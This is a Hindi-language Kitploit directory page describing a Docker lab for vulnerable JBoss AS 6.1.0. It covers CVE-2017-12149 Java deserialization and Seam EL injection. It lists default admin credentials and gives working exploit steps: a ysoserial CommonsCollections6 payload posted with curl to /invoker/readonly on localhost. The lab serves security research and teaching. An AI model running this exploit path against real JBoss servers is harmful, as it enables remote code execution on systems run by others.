Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2017-12149-playground — कंटेनरीकृत JBoss AS 6.1.0 अनुसंधान प्रयोगशाला, जो Java Deserialization (CVE-2017-12149) और JBoss Seam EL Injection कमजोरियों को प्रदर्शित करने के लिए पूर्व-कॉन्फ़िगर एक्सप्लॉइट सत्यापन चरणों के साथ तैयार की गई है। | Kitploit
उपकरण/GitHubGitHub/galois17/cve-2017-12149-playground
कंटेनर सुरक्षाभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

कंटेनरीकृत JBoss AS 6.1.0 अनुसंधान प्रयोगशाला, जो Java Deserialization (CVE-2017-12149) और JBoss Seam EL Injection कमजोरियों को प्रदर्शित करने के लिए पूर्व-कॉन्फ़िगर एक्सप्लॉइट सत्यापन चरणों के साथ तैयार की गई है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
48 महीने पहलेअभी तक समीक्षित नहीं

अनेक महत्वपूर्ण उद्योग (बैंकिंग, स्वास्थ्य सेवा, और विनिर्माण) लीगेसी मिडलवेयर पर निर्भर करते हैं जो विशेष रूप से JBoss 5 या 6 पर चलाने के लिए बनाया गया था। चूँकि ये एप्लिकेशन अक्सर WildFly (JBoss के उत्तराधिकारी) के आधुनिक संस्करणों में माइग्रेट करने के लिए बहुत नाजुक होते हैं, संगठन उन्हें पैच करने के बजाय "एयर-गैप" करना या VPN के पीछे छिपाना चुनते हैं। जब वे परिधि सुरक्षाएँ विफल हो जाती हैं, तब भी भेद्यता वहीं मौजूद रहती है, जीवित और अनपैच्ड।

JBoss AS 6.1.0 भेद्यता अनुसंधान प्रयोगशाला

यह रिपॉजिटरी सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए विशेष रूप से कॉन्फ़िगर किया गया एक कंटेनरीकृत JBoss Application Server 6.1.0 वातावरण प्रदान करती है। इसे Java Deserialization और JBoss Seam EL Injection दोषों को प्रदर्शित करने के लिए डिज़ाइन किया गया है।


त्वरित आरंभ

1. बिल्ड और लॉन्च

कस्टम क्रेडेंशियल्स और कॉन्फ़िगरेशन को सही ढंग से लागू करने के लिए, कंटेनर को स्क्रैच से बिल्ड करें:

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. पर्यावरण तक पहुंचें

JBoss कंसोल: http://localhost:8080/admin-console/

उपयोगकर्ता नाम: admin

पासवर्ड: admin

सत्यापित भेद्यताएँ

1. Java Deserialization (CVE-2017-12149)

इस वातावरण में सबसे विश्वसनीय एक्सप्लॉइट पथ /invoker/readonly पर स्थित HTTPServerILServlet के माध्यम से है।

सत्यापन चरण:

/tmp में एक फ़ाइल बनाने के लिए ysoserial का उपयोग करके एक पेलोड जनरेट करें:

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

बाइनरी पेलोड को curl के माध्यम से भेजें:

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

पुष्टि करें कि एक्सप्लॉइट काम कर गया:

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

सुरक्षा अस्वीकरण यह वातावरण जानबूझकर भेद्य है। इसमें अनपैच्ड, जीवन-अंत (end-of-life) सॉफ़्टवेयर शामिल है।

इसे सार्वजनिक सर्वर पर तैनात न करें।

इन टूल्स का उपयोग उन सिस्टमों पर न करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।

शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए विकसित।

निर्भरताएँ: https://github.com/frohoff/ysoserial

टूल डाउनलोड करें